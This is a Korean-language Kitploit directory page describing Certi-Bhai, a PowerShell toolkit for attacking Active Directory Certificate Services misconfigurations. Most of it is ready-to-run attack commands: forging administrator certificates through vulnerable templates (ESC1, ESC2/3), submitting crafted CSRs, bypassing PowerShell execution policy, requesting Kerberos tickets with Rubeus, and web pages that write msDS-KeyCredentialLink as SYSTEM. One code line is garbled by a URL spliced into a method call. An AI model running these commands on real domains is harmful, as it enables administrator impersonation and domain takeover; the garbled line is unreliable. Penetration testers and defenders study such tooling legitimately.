Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Certi-Bhai — AD CS 익스플로잇 관련 자료는 여기에 들어갑니다 | Kitploit
도구/GitHubGitHub/incredibleindishell/certi-bhai
Privilege EscalationPayload GenerationExploitationPost-ExploitationPenetration TestingAuthenticationRed Teaming
GitHubincredibleindishell/certi-bhai

Certi-Bhai

AD CS 익스플로잇 관련 자료는 여기에 들어갑니다

저장소 보기
26255개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Certi-Bhai: AD CS 공격 툴킷

Certi-Bhai는 AD(Active Directory) 인증서 서비스(AD CS) 취약점을 공격하기 위한 포괄적인 PowerShell 공격 도구 모음입니다. 이 툴킷은 ADCS 환경에서 중요한 보안 오구성(misconfiguration)을 입증하는 다양한 에스컬레이션 시나리오(ESC)를 구현합니다.

📋 목차

  • 개요
  • 디렉터리 구조
  • 사전 요구 사항
  • 사용 가이드
    • ESC1 - 과도하게 허용적인 인증서 템플릿
    • ESC2/3 - 인증서 요청 에이전트
    • ESC15 - 취약한 웹 등록
    • CSR 생성
    • IIS 권한 상승

🎯 개요

AD(Active Directory) 인증서 서비스(AD CS)는 종종 잘못 구성되어 여러 공격 벡터를 생성합니다. Certi-Bhai는 일반적인 ADCS 취약점에 대한 보안 테스트 및 연구를 위한 실용적인 공격 스크립트와 유틸리티를 제공합니다.

승인된 테스트 환경에서만 책임감 있게 사용하십시오.


✅ 사전 요구 사항

  • Windows 7 / Windows Server 2008 이상
  • PowerShell 3.0+
  • Active Directory 도메인 가입 시스템
  • 인증서를 요청할 수 있는 적절한 권한
  • AD CS 인프라에 대한 액세스
  • .NET Framework 3.5+ (ASP.NET 스크립트용)

필수 모듈

root@kitploit:~
# Active Directory 모듈 (선택 사항, 향상된 기능용)
Import-Module ActiveDirectory

🚀 사용 가이드

ESC1: 과도하게 허용적인 인증서 템플릿

취약점: 인증서 템플릿이 임의의 SubjectAltName(SAN) 값으로 등록을 허용합니다.

기능: 과도하게 허용적인 템플릿으로 서명된 인증서를 생성하여 도메인의 모든 사용자 또는 컴퓨터를 가장할 수 있습니다.

사용법:

root@kitploit:~
# ESC1 디렉터리로 이동
cd ESC1

# 공격 스크립트 실행
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
           -templateName "vuln" `
           -altName "administrator" `
           -pfxPass "password123"

매개변수:

  • -subjectName: 대상 사용자의 전체 DN(고유 이름)
  • -templateName: 취약한 인증서 템플릿의 이름
  • -altName: 요청할 대체 이름(사용자 이름/컴퓨터)
  • -pfxPass: PFX 내보내기용 비밀번호

출력: Rubeus와 같은 도구에서 사용할 수 있는 Base64로 인코딩된 PFX 인증서

비디오 튜토리얼: https://www.youtube.com/watch?v=l0gMw_mO4dw


ESC2/3: 모든 용도/인증서 요청 에이전트 남용

취약점: 인증서 요청 에이전트가 모든 사용자를 대신하여 인증서를 요청할 수 있습니다.

기능: 인증서 요청 에이전트로 인증서를 등록한 다음 임의의 보안 주체에 대한 인증서를 요청합니다.

사용법:

root@kitploit:~
# ESC3 디렉터리로 이동
cd ESC3

# 공격 스크립트 실행
.
\esc3_working.ps1 -templateName "CEOTemplate" `
                   -target_user "administrator" `
                   -domain "INDISHELL" `
                   -pfxPass "password123"

매개변수:

  • -templateName: 취약한 요청 에이전트 템플릿
  • -target_user: 인증서를 요청할 보안 주체
  • -domain: 도메인 이름
  • -pfxPass: PFX 비밀번호

출력: Base64 인코딩된 관리자 인증서(PFX)

비디오 튜토리얼: https://www.youtube.com/watch?v=fGjrM-JKnoM


ESC15: 잘못 구성된 스키마 버전 1 템플릿

취약점: 애플리케이션 정책 주입.


CSR 생성 및 관리

빠른 CSR 생성

root@kitploit:~
cd CSR_Generate

# 인증서 서명 요청 생성
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
                -altName "admin"

인증 기관에 CSR 제출

root@kitploit:~
# CA에 CSR 제출
.
\csr_submit.ps1 -csr $csr `
                 -templateName "User" `
                 -caServer "ca-server.domain.local"

IIS 권한 상승

인증서 관리 인터페이스

cert.aspx 웹 인터페이스는 AD CS RPC 엔드포인트에서 인증서를 요청할 수 있는 사용자 친화적인 양식을 제공합니다:

root@kitploit:~
http://your-iis-server/cert.aspx

LDAP 업데이트 인터페이스

웹 인터페이스를 통해 LDAP 속성을 수정합니다. 이 스크립트는 기본적으로 msDS-KeyCredentialLink 속성에 blob을 주입하는 데 사용됩니다:

root@kitploit:~
http://your-iis-server/ldap_update.aspx

기능:

  • LDAP 속성 필터링
  • 개체 수정 기능
  • NT Authority\SYSTEM 컨텍스트 실행

빠른 참조 명령

ESC1 공격용

root@kitploit:~
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
                -templateName "User" `
                -altName "administrator" `
                -pfxPass "P@ssw0rd!"

ESC2/3 사후 공격용

root@kitploit:~
# Rubeus용으로 사용 가능한 형식으로 PFX 변환
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)

Rubeus로 TGT 요청

root@kitploit:~
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap

🔧 문제 해결

일반적인 문제

Q: 스크립트 실행이 차단됨

root@kitploit:~
# 관리자 권한으로 PowerShell 실행
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

Q: 인증서 템플릿을 찾을 수 없음

  • 템플릿 이름이 올바른지 확인
  • 템플릿에서 요청할 수 있는 권한이 있는지 확인
  • 인증 기관 로그 확인

Q: LDAP 연결 실패

  • 도메인 연결 확인
  • 자격 증명 확인
  • ADSI 액세스 확인

📝 기술 세부 사항

인증서 요청 프로세스

  1. 개인 키 생성(2048비트 RSA)
  2. 인증서 요청 생성(PKCS#10)
  3. 주체 이름 및 확장명 설정
  4. 인증 기관에 제출
  5. 발급된 인증서 검색
  6. 비밀번호로 PFX 내보내기

🤝 기여

문제를 발견했거나 개선 사항이 있으신가요? 책임감 있게 보고해 주세요.


도구 다운로드